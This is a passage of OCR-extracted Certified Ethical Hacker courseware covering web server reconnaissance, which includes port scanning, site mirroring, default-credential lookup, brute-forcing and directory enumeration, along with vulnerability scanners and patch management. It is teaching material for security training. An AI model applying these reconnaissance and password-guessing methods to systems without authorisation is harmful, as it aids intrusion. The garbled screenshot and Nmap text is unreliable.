STATE open
SERVICE http
|_http-server-header:
| http-enum
|.
/login.aspx:
[135/tcp
/139/tcp
l445/tcp
'1801/tcp
open
5357/tcp
msrpc
open
msmq?
'3389/tcp open open
Microsoft
Info:
=/
EDT
com IIS
httpd
10.0
microsoft-ds?
Microsoft Windows RPC
Microsoft
Windows
netbios-ssn
msrpc msrpc msrpc
Microsoft Windows RPC Microsoft Windows RPC Microsoft Windows RPC
http
Microsoft
ms-wbt-server Microsoft
Terminal Services
HTTPAPI
|_http-server-header: Microsoft-HTTPAPI/2.0 IAC Address: 02:15:5D:02:45:2F (Unknown)
[Service
http-passwd.root
Possible admin folder
netbios-ssn
[2103/tcp open 12105/tcp open 2107/tcp open
VERSION
Microsoft-IIS/10.0
open
open
22-04-19 60:32 10.10.1.19)
www.movie (reset)
http-frontpage-login
0S:
Windows;
CPE:
httpd
2.0
(SSDP/UPnP)
cpe:/o:microsoft:windows
Service detection performed. Please Nmap done: 1 IP address (1 host up)
report any scanned in
incorrect results 61.63 conds
at
https://nmap.org/submit
Figure 13.27: Screenshot of Nmap.
Module 13 Page 1816
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Website Mirroring
cE H @i2as:
©
WebcopiPr Masi
Mirrora website to create a complete
profile of the site’s directory
structure, file structures, external links, etc.
©
Search for comments and other items
@
Use tools such as WebCopier Pro,
in the HTML source code to make footprinting activities more efficient
HTTrack Web Site Copier, Website Ripper Copier, etc. to mirror a website
‘ee TS]
senses [TEDTOT A Tse [NBME | + ‘hips //unvw maumumsofecom
Website Mirroring Website mirroring copies an entire website and its content onto a local drive. The mirrored website reveals the complete profile of the site’s directory structure, file structure, external links, images, web pages, and so on. With a mirrored target website, an attacker can easily map the website’s directories and gain valuable information. An attacker who copies the website does not need to be online to go through the target website. Furthermore, the attacker can gain valuable information by searching the comments and other items in the HTML source code of downloaded web pages. Many website mirroring tools can be used to copy a target website onto a local drive; examples include WebCopier Pro, HTTrack Web Site Copier, Website Ripper Copier, and Cyotek WebCopy.
Module 13 Page 1817
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Hacking Web Servers
WebCopier Pro
Source: https://www.maximumsoft.com WebCopier Pro is an offline browser to download websites and store them locally, so that they can be viewed/analyzed later. It allows attackers to analyze the website structure and find dead links. )
2 ees):
com
+
Home fi
es
| ¥
Download
WebCopier Pro - MaximumSoft website Advanced ™ Stop
Airing
WW Pause
Browse Stat — Project Project DX Settings || Downloads [ia Preview || Files» Project Download ax
Mo Properties Browse
O
[Schedule
L&E © convert Links
Qq
*x
Theme » ig) i) Q support
itp of the day
Hel Ip Copyto || Program iPhone / iPad || Options “P Show Report || Topics W Check Version
MiBEt72%
5-5) MaximumSoft website
@® MaximumSoft (defauit-htm) Download Status | Downloading...
File Name
© marimumsoft.com/suppatt/index him
© masimumsoft. com/buy/index htm © maximumsoft.com/css/uikit. oss (S..Zimg/buttons/appstore_amazon.png
LSS /ima/buttons/sppstore_google.png
unknown
unknown 144.2KB unknown
14.4 KB
Found 542
150.7 KB/sec
Processed | 409
705.3 KB/sec
Filtered BJ
SProjects
[}contents| EGtogrite
|
From cache
Enors
17.6 MB
[0
30.8 MB
Browser | WY Download info
Figure 13.28: Screenshot of WebCopier Pro.
The following are some additional website mirroring tools:
HTTrack Web Site Copier (https://www.httrack.com) Website Ripper Copier (https://www.tensons.com) Cyotek WebCopy (https://www.cyotek.com) Portable Offline Browser (http://www.metaproducts.com) Offline Explorer Enterprise (https://metaproducts.com)
Module 13 Page 1818
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Finding Default Credentials of Web Server
CEH
@ Many web server administrative interfaces are publicly accessible and are in the web root directory @ Often these administrative interface credentials are not properly configured and remain set to default
Default Passwords
interface and use the following techniquesto identify the default login credentials:
© Consult the administrative interface documentation and identify the default passwords @ Use Metasploit’s built-in database to scan the server
© Use online resources like Open Sez Me (https://opensez.me), cirt.net (https://cirt.net/passwords), etc © Attempt password guessing and brute-forcing attacks
ever NETSPHRKER CLOUD SHS AEF = tps//orenev/passwords
Finding Default Credentials of Web Server Administrators or security personnel use administrative interfaces to securely configure, manage, and monitor web application servers. Many web server administrative interfaces are publicly accessible and located in the root directory. Often, these administrative interface credentials are not properly configured and remain set to default. Attackers attempt to identify the running application interface of the target web server by performing port scanning. Once the running administrative interface is identified, the attacker uses the following techniques to identify the default login credentials: =
Consult the administrative interface documentation and identify the default passwords
=
Use Metasploit’s built-in database to scan the server
=
Use online resources such as Open Sez Me (https://open-sez.me) and cirt.net (https://cirt.net/passwords) to identify the default passwords
=
Attempt password-guessing and brute-forcing attacks
These default credentials can grant access to the administrative interface, compromising the web server and allowing the attacker to exploit the main web application.
Module 13 Page 1819
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers =
Exam 312-50 Certified Ethical Hacker
cirt.net Source: https://cirt.net/passwords cirt.net is a lookup database for default passwords, credentials, and ports.
Defautt
Scan your
Weasithiane
Ocfault Passwords
and vulnerabilities ‘@passdbon Twitter! Firefox Search Join Nikto-Announce List Email Address *
wi
0 Syst
First Name *
TOO MANY WEBSITES TO SCAN FOR VULNERABILITIES?
cate! (iiiiesiae
Alot
po
Apple
Technolo«
os
IS JUST MADE FOR YOU!
(ri)
scusomerices
(AREETRIAL')
Como
Figure 13.29: Screenshot displaying the default password DB page of cirt.net
The following are some additional websites for finding the default passwords of web server administrative interfaces:
=
https://open-sez.me
=
https://www.fortypoundhead.com
=
http://www.defaultpassword.us
=
https://default-password.info
=
https://www.routerpasswords.com
Module 13 Page 1820
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Finding Default Content of Web Server
CEH
|@ Most web application servers contain default content and functionalities, which allows attackers to leverage attacks @
Check forthe following default contents and functionalities in the web servers
© Administrator debug and test functionality © Sample functionality to demonstrate common tasks
© Publicly accessible powerful functions © Server installation manuals @
Use tools like Nikto2 (https://cirt.net) to identify the default content
Copyright © by
Ties Jere net Rights Reserved. Reproduction f Sty Prohibited.
Finding Default Content of Web Server Most servers of web applications have default contents and functionalities that allow attackers to launch attacks. The following are some common default contents and functionalities that an attacker attempts to identify in web servers. =
Administrators debug and test functionality Functionalities applications and state of both the main targets for
=
designed for administrators to debug, diagnose, and test web web servers contain useful configuration information and the runtime server and its running applications. Hence, these functionalities are the attackers.
Sample functionality to demonstrate common tasks Many servers contain various sample scripts and pages designed to demonstrate certain application server functions and application programming interfaces (APIs). Often, web servers fail to secure these scripts from attackers, and these sample scripts either contain vulnerabilities that can be exploited by attackers or implement functionalities that allow attackers to exploit.
=
Publicly accessible powerful functions Some web servers include powerful functionalities that are intended for administrative personnel and restricted from public use. However, attackers attempt to exploit such powerful functions to compromise the server and gain access. For example, some application servers allow web archives to be deployed over the same HTTP port as that used by the application. An attacker may use common exploitation frameworks such as Metasploit to perform scanning to identify default passwords, upload backdoors, and gain command-shell access to the target server.
Module 13 Page 1821
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Hacking Web Servers
=
Server installation manuals An attacker attempts to identify server manuals, which may contain useful information about configuration and server installation. Accessing this information allows the attacker to prepare an appropriate framework to exploit the installed web server.
Tools such as Nikto2 can be used to identify default contents. =
Nikto2 Source: https://cirt.net Nikto is a vulnerability scanner used extensively to identify potential vulnerabilities in web applications and web servers.
Figure 13.30: Screenshot of Nikto2
Module 13 Page 1822
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
CEH
Finding Directory Listings of Web Server @ When a web server receives a request for the directory, it responds to the request in the following ways:
@ Attackers use tools such as Dirhuntto search and analyze directories
@ Retums default resource within the directory @ Returns error
© Returns listing of directory content ‘@
Directory listings sometimes possess the following
vulnerabilities that allow the attackers to compromise the web server:
@
Improper access controls
© Unintentional access to the web root of servers @ After discovering the directory on the web server, makea request for the same directory and try to access the directory listings ©@
Try to exploit vulnerable web server software that gives
access to the directory listings
‘hips //othub com AlRights Reserved. Reproduction f Sty Prohibited
Copyright © by
Finding Directory Listings of Web Server When a web server receives a request for a directory, responds to the request in the following ways.
rather than a
file, the web
server
=
Return Default Resource within the directory: The server may return a default resource within the directory, such as index.html.
=
Return Error: The server may return an error, indicating that the request is not permitted.
=
Return listing of directory content: The server may return a listing showing the contents of the directory. A sample directory listing is shown in the screenshot.
such
as the
HTTP
status
code
403,
x
index.
© B to101.13
Index of /sk=m=m
Gprsckaze jzon © screenshot
Figure 13.31: Screenshot displaying a sample directory listing
Module 13 Page 1823
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Though directory listings do not have significant relevance from a security perspective, they occasionally possess the following vulnerabilities that allow attackers to compromise web applications:
=
Improper access controls
=
Unintentional access to the web root of servers
In general, after discovering a directory on a web server, an attacker makes a request for that directory and attempts to access the directory listing. Attackers also attempt to exploit vulnerable web server software that grants access to directory listings. Attackers use tools such as Dirhunt and Sitechecker to find directory listings of the target web
server. =
Dirhunt
Source: https://github.com Dirhunt is a web crawler optimized for searching and analyzing directories. This tool can find interesting results if the server has the "index of" mode enabled. Dirhunt is also useful if the directory listing is not enabled. It detects directories with false 404 errors, directories where an empty index file has been created to hide things, and so on.
ee File Edit
Search
J-lattacker@parrot $dirhunt
htt
to
ne
Started
raceback
Divhunt
now
(most
Terminal
Help
Parrot Terminal
/certifiedhacker.com/
recent
call
last):
File "/usr/local/Lib/python3.9/dist-packages/dirhunt/exceptions.py", lin wrapped return
func(*args,
line 47,
**kwargs)
File "/usr/local/lib/python3.9/dist-packages/dirhunt/crawler_url.py", in start processor.process(text,
soup)
File “/usr/local/lib/python3.9/dist-packages/dirhunt/processors.py", in process text = text.decode(‘'utf-8')
codec can't decode byte ‘utf-8' lUnicodeDecodeError: (HTML document) [200] http://certifiedhacker.com/ index.html http://certifiedhacker.com/sample-login.html
Index
file
found:
index.html
position
®xa9
in
(Not
Found)
line 79, line
261,
68416:
inva}
[200] http://certifiedhacker.com/corporate-learning-website/@1-homepage.html ML document) [200]
http://certifiedhacker.com/css/
(Generic)
[200]
htt
/certifiedhacker.com/Turbo
[200] [200]
htt htt
(Generic) /certifiedhacker.com/js/ /certifiedhacker.com/corporate-learning-website/about_us.html
[200]
http://certifiedhacker.com/Online
Max/index.htm
(HTML
Booking/index.htm
(H
document)
(HTML document)
document) [200] http://certifiedhacker.com/corporate-learning-website/services.html
(HTML
(HTML
Figure 13.32: Screenshot of Dirhunt displaying directories and files Module 13 Page 1824
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Vulnerability Scanning
CEH
@ Implement vulnerability scan to identify weaknesses in a network and determine if the system can be exploited
@ Sniff the network traffic to find any active systems, network services, applications, and vulnerabilities present
lo ©
|G Use vulnerability scanners such as Acunetix Web Vulnerability Scanner, and Fortify WebInspect to find hosts, services, and vulnerabilities
@ Test the web server infrastructure for any misconfigurations, outdated content, and
vulnerabilities using vulnerability scanners like Acunetix Web Vulnerability Scanner
‘ps:/faow.ccuneticcom
Vulnerability Scanning Vulnerability scanning is performed to identify vulnerabilities and misconfigurations in a target web server or network. Vulnerability scanning reveals possible weaknesses in a target server to exploit in a web server attack. In the vulnerability-scanning phase, attackers use sniffing techniques to obtain data on the network traffic to determine active systems, network services,
and applications. Automated tools such as Acunetix Web Vulnerability Scanner are used to perform vulnerability scanning on a target server and find hosts, services, and vulnerabilities. =
Acunetix Web Vulnerability Scanner Source: https://www.acunetix.com Acunetix Web Vulnerability Scanner (WVS) scans websites and detects vulnerabilities. Acunetix WVS checks web applications for SQL injections, XSS, and so on. It includes advanced pen testing tools to ease manual security audit processes and creates professional security audit and regulatory compliance reports based on AcuSensor Technology. It supports the testing of web forms and password-protected areas, pages with CAPTCHA, single sign-on, and two-factor authentication mechanisms. It detects application languages, web server types, and smartphone-optimized sites. Acunetix crawls and analyzes different types of websites, including HTML5, Simple Object Access Protocol (SOAP), and Asynchronous JavaScript and Extensible Markup Language (AJAX). It supports the scanning of network services running on the server and the port scanning of the web server.
Module 13 Page 1825
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Hacking Web Servers
To)
x
=
x
@ Acunetsx- scans
localhost
3
yee
ie)
acunetix
a -
High
Med
Low
ntp:rwww.mutest informalware-demos-named/MSO7-004N,
1
1
°
1 teto:rwe ww muvtestinto/malware-demos-namesS06-057/
1
°
o
PHich }
1
ntpsrwww.mwtest.informalware-demos-named/MS06-014-R
2
"
0
[HIGH
Etre ww. muvtestinfoimalware-demos-namedMS06-014-R.
2
1"
0
PHich }
1 teto:nwr ww movtest.into/malware-demos-namedniS06.013/
1
°
°
[rick J
©
1
°
°
©
mmutest =info
Log out
ntp:rwww.mutest informalware-demos-named/APSB10-02)
severity
Figure 13.48: Screenshot of QualysGuard Malware Detection
The following are some additional web server malware infection monitoring tools:
=
Sucuri SiteCheck (https://sucuri.net)
=
SiteLock Malware Removal (https://www.sitelock.com)
=
Quttera (https://quttera.com)
=
Web Inspector (https://www.webinspector.com)
=
SiteGuarding (https://www.siteguarding.com)
Module 13 Page 1866
Ethical Hacking and Countermeasures Copyright © by E6-Goul All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Web Server Security Tools
CE H
Fortify Webinspect is an automated dynamic testing solution Fortify WebInepect | that discovers configuration issues and identifies and prioritizes in running applications epInspect | security vulnerabilit ies
=p
Acunetix Web Vulnerability Scanner ‘tps: [fun acunetie.com
ems NetIQ Secure Configuration ® ~~ Manager “https://www. netiq.com
SAINT Security Suite ‘es: //u.carson-sot.com
Sophos Intercept X for Server
“https://www.sophos.com
UpGuard
“https://wwww. upguard.com
Web Server Security Tools =
Fortify Webinspect
Source: https://www.microfocus.com Fortify Webinspect is an automated dynamic testing solution that discovers configuration issues as well as identifies and prioritizes security vulnerabilities in running applications. It mimics real-world hacking techniques and provides a comprehensive dynamic analysis of complex web applications and services. WebInspect dashboards and reports provide organizations with visibility and an accurate risk posture of its applications.
Module 13 Page 1867
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
File Edit View Took Scan Enterprise Sewer Reports Help } New + BF Open > 8 Compliance Manager [Ei Policy Manager (E] Report @ Schedule 4G} Smantpdate
[epecteons | @ TrathcMontor
_ Smart Audited: 141 of 632 Most Info mu P2P info Bax Wilcertfeaes
Verified: 0 of 147 Reflection Audited: 0 of
B cookies
Figure 13.49: Screenshot of Fortify WebInspect
The following are some additional web server security tools:
=
Acunetix Web Vulnerability Scanner (https://www.acunetix.com)
=
NetIQ Secure Configuration Manager (https://www.netig.com)
=
SAINT Security Suite (https://www.carson-saint.com)
=
Sophos Intercept X for Server (https://www.sophos.com)
=
UpGuard (https://www.upguard.com)
Module 13 Page 1868
Ethical Hacking and Countermeasures Copyright © by E6-Goul All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Web Server Pen Testing Tools CORE Impact © CORE Impact finds vulnerabilities on an organization's web server © This tool allows a user to evaluate the security posture of a web server using the present-day cybercrime techniques Web Server Pen Testing Tools @
Immunity
fe .
CANVAS
(https://www.immunityinc.com)
=
© Arachni (https://www.arachniscanner.com) @ WebSurgery (https://sunrisetech.gr) © Mitmprox (https://mitmproxy.org) @ Webalizer (https://webalizer. net)
tas://www.coresecuty.com
Web Server Pen Testing Tools =
CORE Impact
Source: https://www.coresecurity.com CORE Impact finds vulnerabilities in an organization’s web server. This tool allows a user to evaluate the security posture of a web server by using the same techniques currently employed by cyber criminals. It scans for possible vulnerabilities in the web server, imports scan results, and runs exploits to test the identified vulnerabilities. It can also scan network servers, workstations, firewalls, routers, and various applications for vulnerabilities; identify which vulnerabilities pose real threats to the network; determine the potential impact of exploited vulnerabilities; and prioritize and execute
remediation efforts.
Module 13 Page 1869
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Hacking Web Servers
{Get AD data wth SharpHound (Bloedtound Colectr)
mea
Figure 13.50: Screenshot of CORE Impact
The following are some additional web server pen testing tools: =
Immunity CANVAS (https://www.immunityinc.com)
=
Arachni (https://www.arachni-scanner.com)
=
WebSurgery (https://sunrisetech.gr)
=
Mitmprox (https://mitmproxy.org)
=
Webalizer (https://webalizer.net)
Module 13 Page 1870
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
CEH LO#05: Summarize Patch Management Concepts
Copyright © by
Patch Management Developers always attempt to find bugs in a web server and fix them. Bug fixes are distributed in the form of patches, which provide protection against known vulnerabilities. Unpatched or vulnerable patches can create a security loophole in the web server. This section describes the role of patches, upgrades, and hotfixes in securing web servers. This section also provides guidance for choosing proper patches, upgrades, hotfixes, and their appropriate sources for
secure patch management.
Module 13 Page 1871
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Patches and Hotfixes 1]
(4)
CEH
Hotfixes are an update to fix a specific customer issue and not always distributed outside the customer
organization
A patchis a small piece of software designed to fix problems, security vulnerabilities, and bugs and improve the performance of a computer program or its supporting data
Users maybe notified through emails or through the vendor's website A patch can be considered as a repair job for a programming problem Hotfixesare sometimes packaged as a set of fixes called a combined hotfix or service pack
Patches and Hotfixes A patch is a small piece of software designed to fix problems, security vulnerabilities, and bugs as well as improve the usability or performance of a computer program or its supporting data. A patch can be considered a repair job for a programming problem. A software vulnerability is the weakness of a software program that makes it susceptible to malware attacks. Software vendors provide patches that prevent exploitations and reduce the probability of threats exploiting a specific vulnerability. Patches include fixes and updates for multiple known bugs or issues. A patch is a publicly released update that is available for all customers. A system without patches is much more vulnerable to attacks than a regularly patched system. If an attacker can identify a vulnerability before it is fixed, then the system might be susceptible to malware attacks. A hotfix is a package used to address a critical defect in a live environment and contains a fix for a single issue. It updates a specific product version. Hotfixes provide quick solutions and ensure that the issues are resolved. Apply hotfixes to software patches on production systems.
Vendors update users about the latest hotfixes through email or make them available on their official website. Hotfixes are updates that fix a specific customer issue and are not always distributed outside the customer organization. Vendors occasionally deliver hotfixes as a set of fixes called a combined hotfix or service pack.
Module 13 Page 1872
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
What is Patch Management? ‘@
cE H
“Patch management is a process used to fix known vulnerabilities by ensuring that the appropriate patches are installed on a system”
An automated patch management process Detect
| © Use tools to detect missing security patches
Assess
| @ Asses the issue(s) and associated severities by mitigating the factors that may influence the decision
Acquire
| @ Download the patch for testing
Test
| @ Install the patch first on a testing machine to verify the consequences of the update
Deploy
| @ Deploy the patch to the computers and ensure that the applications are not affected
Maintain
| @ Subscribeto get notifications about vulnerabilities as they get detected
What is Patch Management? According to https://www.techtarget.com/searchenterprisedesktop/, patch management is an area of systems management that involves acquiring, testing, and installing multiple patches (code changes) in an administered computer system. Patch management is a method of defense against vulnerabilities that cause security weaknesses or corrupt data. It is a process of scanning for network vulnerabilities, detecting missed security patches and hotfixes, and then deploying the relevant patches as soon as they are available to secure the network. It involves the following tasks: =
Choosing, verifying, testing, and applying patches
=
Updating previously applied patches with current patches
=
Listing patches applied previously to the current software
=
Recording repositories or depots of patches for easy selection
=
Assigning and deploying the applied patches
An automated patch management process includes the following steps.
=
Detect: Use tools to detect missing security patches.
=
Assess: Asses the issue(s) and its associated severity by mitigating the factors that may influence the decision.
=
Acquire: Download the patch for testing.
=
Test: Install the patch first on a test machine to verify the consequences of the update.
=
Deploy: Deploy the patch to computers and ensure that applications are not affected.
=
Maintain:
Subscribe
to
receive
notifications
about
vulnerabilities
when
they
are
reported. Module 13 Page 1873
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Installation of a Patch Identifying Appropriate Sources for Updates and Patches
@
First, make a patch management plan that fits the operational environment and business objectives
@ Find appropriate updates and patcheson the homesites of the applications or operating systems’ vendors
|@ The recommended way of tracking issues relevant to proactive patching is to register with the home sites to receive alerts
Implementation and Verification of a Security Patch or Upgrade
Installation of a Patch
Users can access and install security patches via the World Wide Web
@ Before installing any patch, verify
Patches can be installed in two ways
@ Use a proper patch management program to validate file versions and checksums before deploying security patches
Manual Installation
@ In this method, the user downloads the patch from the vendor and installs it
Automatic Installation
© Inthis method, the applications use the Auto Update feature to
update themselves
the source
|@ The patch management tool must be able to monitor the patched systems @ The patch management team should check for updates and
patches regularly
Installation of a Patch The installation of a patch entails the following tasks. Identifying Appropriate Sources for Updates and Patches It is important to identify appropriate sources for updates that are not installed from trusted sources more vulnerable to attacks, instead of hardening appropriate sources for updates and patches plays a The following are some patches.
updates and patches. Patches and can render the target server even its security. Thus, the selection of vital role in securing web servers.
methods for identifying appropriate sources for updates and
o
Create a patch management plan that fits the operational environment and business objectives.
o
Find appropriate updates and patches on the home sites of the applications or OS vendors.
o
The recommended method of tracking issues relevant to proactive register to the home sites to receive alerts.
patching
is to
Installation of a Patch Users can access and install security patches via the World Wide Web. Patches can be installed in two ways. o
Manual Installation
In this method, the user downloads the patch from the vendor and installs it.
Module 13 Page 1874
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers °
Exam 312-50 Certified Ethical Hacker
Automatic Installation In this method, applications use an auto update feature to update themselves.
=
Implementation and Verification of a Security Patch or Upgrade °
Before installing any patch, verify the source.
°
Use a proper patch management program to validate file versions and checksums before deploying security patches. The patch management tool must be able to monitor the patched systems. The patch management team should check for updates and patches regularly.
Module 13 Page 1875
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Patch Management Tools
ntos://wwwf.com
BB
Suite ‘tps: broadcom. com
OC
Solarwinds Patch Manager ‘ts: / fun solaris.com
s
GFI LanGuard's patch management automatically scans your network and installs and manages security and non-security patches
Symantec Client Management
Kaseya Patch Management nips: //o kaseya.com
fF
GFI LanGuard
CE H
Software Vulnerability Manager ‘nep:/ fw fexera.com Ivanti Patch for Endpoint Manager ‘maps: antcom
Patch Management Tools
=
GFI LanGuard Source: https://www.gfi.com The GFI LanGuard patch management software scans the user’s network automatically as well as installs and manages security and non-security patches. It supports machines across Microsoft®, MAC OS X®, and Linux® operating systems, as well as many thirdparty applications. It allows auto-downloads of missing patches as well as patch rollback, resulting in a consistently configured environment that is protected from threats and vulnerabilities.
Module 13 Page 1876
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
SDESCRBBCECEOR
Hacking Web Servers
Figure 13.51: Screenshot of GFI LanGuard patch management software
The following are some additional patch management tools:
=
Symantec Client Management Suite (https://www.broadcom.com)
=
Solarwinds Patch Manager (https://www.solarwinds.com)
=
Kaseya Patch Management (https://www.kaseya.com)
=
Software Vulnerability Manager (https://www.flexera.com)
=
Ivanti Patch for Endpoint Manager (https://www.ivanti.com)
Module 13 Page 1877
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Module Summary o
Q
,
CEH
Inthis module, we have discussed the following: > Web server concepts > Various web server threats and attacks in detail > Web server attack methodology in detail, including information gathering, web server footprinting, website mirroring, vulnerability scanning, session hijacking, and web
server passwords hacking
> Various web server hacking tools > Various countermeasures that are to be employed to prevent web server hacking attempts by threat actors
> Detailed discussion on securing web servers using various security tools > Patch management concepts
Q Inthe next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, hack web applications Copyright © by
ved. Reproduction is Sticty Prohisted
Module Summary In this module, we discussed in detail the general concepts related to web servers; various web server threats and attacks; the web server attack methodology, including information gathering, web server footprinting, website mirroring, vulnerability scanning, session hijacking, and web server passwords hacking; and various web server hacking tools. Additionally, we discussed various countermeasures that can be employed to prevent web server hacking attempts by threat actors. We also discussed how to secure web servers using various security tools. We concluded the module with a detailed discussion on patch management concepts. In the next module, we will discuss in detail how attackers, including ethical hackers and pen testers, hack web applications.
Module 13 Page 1878
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
-
Certified | Ethical
EC-Council
Hacker
———
MODULE
14
HACKING WEB ———APPLICATIONS
EC-COUNCIL OFFICIAL CURRICULA
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
CEH
LO#01: Summarize Web Application Concepts
©
LO#02: Demonstrate Web Application Threats
o
®
OBJECTIVES
LO#04: Explain Web API, Webhooks, and Web Shell
o
LEARNING
LO#05: Summarize the Techniques used in Web
© LO#03: Explain Web Application Hacking Methodology
Application Security
Copyright © by
Learning Objectives The evolution of the Internet and web technologies, combined with rapidly increasing Internet connectivity, has led to the emergence of a new business landscape. Web applications are an integral component of online businesses. Everyone connected via the Internet is using various web applications for different purposes, including online shopping, email, chats, and social networking. Web applications are becoming increasingly vulnerable to more sophisticated threats and attack vectors. This module will familiarize you with various web applications and web attack vectors as well as how to protect an organization’s information resources from them. It describes the general web application hacking methodology that most attackers use to exploit a target system. Ethical hackers can use this methodology to assess their organization’s security against web application attacks. This module will also familiarize you with web API, webhooks, and web shell concepts as well as hacking. In addition, it discusses several tools that are useful in different stages of web application security assessment. At the end of this module, you will be able to: =
Describe web application concepts
=
Perform various web application attacks
=
Describe the web application hacking methodology
=
Use different web application hacking tools
=
Explain web API, webhooks, and web shell concepts
=
Understand how to hack web applications via web API, webhooks, and web shells
Module 14 Page 1881
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
=
Adopt countermeasures against web application attacks
=
Use different web application security testing tools
Module 14 Page 1882
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
CEH LO#01: Summarize Web Application Concepts
Copyright © by
Web Application Concepts This section describes the basic concepts associated with web applications vis-a-vis security concerns—their components, how they work, their architecture, and so on. Furthermore, it provides insights into web services and vulnerability stacks.
Module 14 Page 1883
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
Introduction to Web Applications
CE H
@ Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser @ Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, and session hijacking
]
ane! User
How Web Applications Work
tp: eeriedhacker.
Login Form OS system calls
Operating System * from news where id = 6329 Copyright © by
A
served. Reproduction is Sticty Prohibited.
Introduction to Web Applications Web applications are software programs that run on web browsers and act as the interface between users and web servers through web pages. They enable the users to request, submit, and retrieve data to/from a database over the Internet by interacting through a user-friendly graphical user interface (GUI). Users can input data via a keyboard, mouse, or touch interface depending on the device they are using to access the web application. Based on browsersupported programming languages such as JavaScript, HTML, and CSS, web applications work in combination with other programming languages such as SQL to access data from the databases.
Web applications are developed as dynamic web pages, and they allow users to communicate with servers using server-side scripts. They allow users to perform specific tasks such as searching, sending emails, connecting with friends, online shopping, and tracking and tracing. Furthermore, there are several desktop applications that provide users with the flexibility to work with the Internet. Entities develop various web applications to offer their services to users via the Internet. Whenever users need to access such services, they can request them by submitting the Uniform Resource Identifier (URI) or Uniform Resource Locator (URL) of the web application in a browser. The browser passes this request to the server, which stores the web application data and displays it in the browser. Some popular web servers are Microsoft IIS, Apache HTTP Server, H20, LiteSpeed, Cherokee, etc.
